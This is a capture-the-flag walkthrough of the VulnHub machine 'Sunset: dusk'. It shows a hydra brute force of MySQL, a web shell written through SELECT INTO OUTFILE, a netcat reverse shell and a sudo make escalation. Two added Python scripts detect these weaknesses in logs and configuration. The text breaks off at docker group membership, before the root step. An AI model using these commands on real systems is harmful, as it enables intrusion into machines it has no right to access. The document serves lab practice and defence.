Sunset: dusk is another CTF challenge from VulnHub. The difficulty level is set for beginners, and credit goes to whitecr0wz. It is a boot-to-root challenge in which you have to hunt two flags. Download it from here.
Penetration Testing Methodologies
Network Scanning
· Nmap
· Netdiscover
· Weak credentials
· PHP file injection
Exploiting RCE
Privilege Escalation
· Sudo rights
· Docker
Network Scanning
First of all, we identify our target host on the network. We did this using the netdiscover command.
Now that we have identified our target using the above command, we can continue to our next step i.e. scanning the host IP to identify open ports and running services. We will use Nmap to scan the target with the following command:
nmap -A
As a result, we found multiple open ports with services running on them, so we need to enumerate further.
We started enumeration with FTP and HTTP and looked for anything suspicious, but unfortunately found no useful clue, so we tried a MySQL brute-force attack with hydra using the rockyou.txt wordlist.
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql
This gave us the MySQL login credentials: the username is root and the password is password, which is also a weak credential.
We also navigated to port 8080, where the page lists the contents of the current directory; here the author has left a hint that /var/tmp is a writable directory. These loopholes together make it easy for us to compromise the machine.
Since we have the MySQL credentials and know that /var/tmp is the working directory, we can write malicious PHP code into a file named "raj.php" through an SQL query. This gives us remote code execution (RCE), which we will exploit to get a shell on the host machine.
select "" into outfile '/var/tmp/raj.php';
Navigating to port 8080 again, we saw the entry for the raj.php file.
It was time to execute raj.php and verify the RCE parameter by requesting the following URL:
This confirmed that we are able to run system commands through this page.
It was time to exploit the RCE, so we used a netcat reverse shell to get a shell on the host machine.
-e /bin/bash 1234
Bravo!! We hit the goal, spawned a shell on the host machine, and found the first flag, user.txt, in /home/dusk.
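The chain above, a password brute force against MySQL followed by a `SELECT ... INTO OUTFILE` write into a directory served over HTTP, leaves traces a defender can look for in the MySQL logs. The following Python script is an added example and is not part of the original walkthrough: it counts failed logins per user and source host and flags file writes that land outside MySQL's `secure_file_priv` directory or inside a web-served directory. The log lines are constructed samples modelled on the MySQL general query log format, and the `secure_file_priv` value and web-root directories are assumptions to adapt to the host. A write to /var/tmp succeeding, as it did here, means `secure_file_priv` was not restricting file writes (an empty value in MySQL means no restriction); pinning it to a dedicated directory and giving root a strong password that is not accepted from remote hosts closes this path.

```python
import re
from collections import Counter
from pathlib import PurePosixPath

# Constructed sample lines modelled on the MySQL general query log
# (time, thread id, command, argument). Hosts, paths and payload are
# hypothetical; the written PHP is deliberately omitted.
SAMPLE_LOG = """\
2020-01-06T10:15:31.000001Z\t   12 Connect\tAccess denied for user 'root'@'192.168.1.5' (using password: YES)
2020-01-06T10:15:31.000002Z\t   13 Connect\tAccess denied for user 'root'@'192.168.1.5' (using password: YES)
2020-01-06T10:15:31.000003Z\t   14 Connect\tAccess denied for user 'root'@'192.168.1.5' (using password: YES)
2020-01-06T10:15:31.000004Z\t   15 Connect\tAccess denied for user 'root'@'192.168.1.5' (using password: YES)
2020-01-06T10:15:31.000005Z\t   16 Connect\tAccess denied for user 'root'@'192.168.1.5' (using password: YES)
2020-01-06T10:15:32.000006Z\t   17 Connect\troot@192.168.1.5 on  using TCP/IP
2020-01-06T10:15:40.000007Z\t   17 Query\tselect "<omitted>" into outfile '/var/tmp/raj.php'
2020-01-06T10:16:01.000008Z\t   18 Query\tSELECT name INTO OUTFILE '/var/lib/mysql-files/export.txt' FROM customers
2020-01-06T10:16:05.000009Z\t   19 Query\tselect 1
"""

DENIED_RE = re.compile(r"Access denied for user '([^']+)'@'([^']+)'")
OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+'([^']+)'", re.IGNORECASE)


def failed_logins(log_text):
    """Count failed authentication attempts per (user, source host)."""
    counts = Counter()
    for line in log_text.splitlines():
        m = DENIED_RE.search(line)
        if m:
            counts[(m.group(1), m.group(2))] += 1
    return counts


def brute_force_sources(log_text, threshold=5):
    """(user, host) pairs whose failed-login count reaches the threshold."""
    return sorted(k for k, v in failed_logins(log_text).items() if v >= threshold)


def is_under(path, directory):
    """True if path lies inside directory (pure string path logic, no I/O)."""
    try:
        PurePosixPath(path).relative_to(directory)
        return True
    except ValueError:
        return False


def risky_file_writes(log_text, secure_file_priv="/var/lib/mysql-files",
                      web_dirs=("/var/www", "/var/tmp")):
    """Flag INTO OUTFILE/DUMPFILE writes outside secure_file_priv or into
    a web-served directory. An empty secure_file_priv means unrestricted,
    so every write is then reported. Returns [(path, [reasons]), ...]."""
    findings = []
    for line in log_text.splitlines():
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        reasons = []
        if not secure_file_priv or not is_under(path, secure_file_priv):
            reasons.append("outside secure_file_priv")
        if any(is_under(path, d) for d in web_dirs):
            reasons.append("inside a web-served directory")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for user, host in brute_force_sources(SAMPLE_LOG):
        print(f"possible brute force: {user} from {host}")
    for path, reasons in risky_file_writes(SAMPLE_LOG):
        print(f"risky file write to {path}: {', '.join(reasons)}")
```

MySQL records "Access denied" notes in its error log and, when the general query log is enabled, every statement in the general log; point the script at whichever log the server keeps. The web-server directory list here is taken from the walkthrough's hint about /var/tmp and should be replaced with the document roots actually served on the host.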
Privilege Escalation
Moving on to privilege escalation, we checked the sudo rights for www-data and noticed that user www-data holds sudo rights for the "make" and "sl" programs; here we escalate to a shell as user dusk by exploiting the make program.
sudo -u make -s --eval=$'x:\n\t-'"$COMMAND"
After executing the above command, we got a shell on the host as user dusk, who is also a member of the docker group.
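The escalation path above rests on two misconfigurations: a web-server service account holding sudo rights, and an interactive user in the docker group (access to the Docker daemon is equivalent to root on the host). The following Python script is an added example, not part of the original walkthrough, that audits a sudoers file and /etc/group for exactly these conditions. The sudoers and group contents are constructed samples mirroring what the walkthrough found, and the lists of service accounts and root-equivalent groups are assumptions to tune for your environment.

```python
import re

# Constructed sample files mirroring what the walkthrough found on the box;
# neither is the machine's real /etc/sudoers or /etc/group.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# hypothetical rule: the web server account may run make and sl as dusk
www-data ALL=(dusk) NOPASSWD: /usr/bin/make, /usr/games/sl
"""
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
www-data:x:33:
docker:x:999:dusk
"""

# Assumed lists; adjust to the accounts and groups present on your hosts.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres", "ftp"}
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk", "sudo", "wheel"}

# One user specification line: who host=(runas) TAG: cmd, cmd
SUDOERS_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:(?:NO)?(?:PASSWD|SETENV|EXEC):\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return the user specification rules of a sudoers file as dicts.

    Defaults lines, aliases and comments are skipped; the runas field keeps
    only the user part (a ':group' suffix is dropped) and defaults to root.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        first = line.split()[0]
        if first.startswith("Defaults") or first.endswith("_Alias"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0]
        rules.append({
            "who": m.group("who"),
            "runas": runas,
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def parse_groups(text):
    """Map group name -> list of supplementary members from /etc/group text."""
    members = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == 4:
            members[parts[0]] = [u for u in parts[3].split(",") if u]
    return members


def audit(sudoers_text, group_text):
    """Human-readable findings for the two conditions exploited above."""
    findings = []
    for rule in parse_sudoers(sudoers_text):
        if rule["who"].startswith("%"):
            continue  # group rules are judged through membership below
        if rule["who"] in SERVICE_ACCOUNTS:
            msg = (f"service account {rule['who']} may run "
                   f"{', '.join(rule['cmds'])} as {rule['runas']}")
            if rule["nopasswd"]:
                msg += " without a password"
            findings.append(msg)
    groups = parse_groups(group_text)
    for group in sorted(ROOT_EQUIVALENT_GROUPS):
        for user in groups.get(group, []):
            findings.append(f"user {user} is in group {group}, "
                            "which grants root-equivalent access")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS, SAMPLE_GROUP):
        print(finding)
```

The fix on a host like this one is to remove the sudo rule for www-data entirely (a web-server account has no business running anything as another user) and to keep the docker group limited to administrators who are already trusted with root.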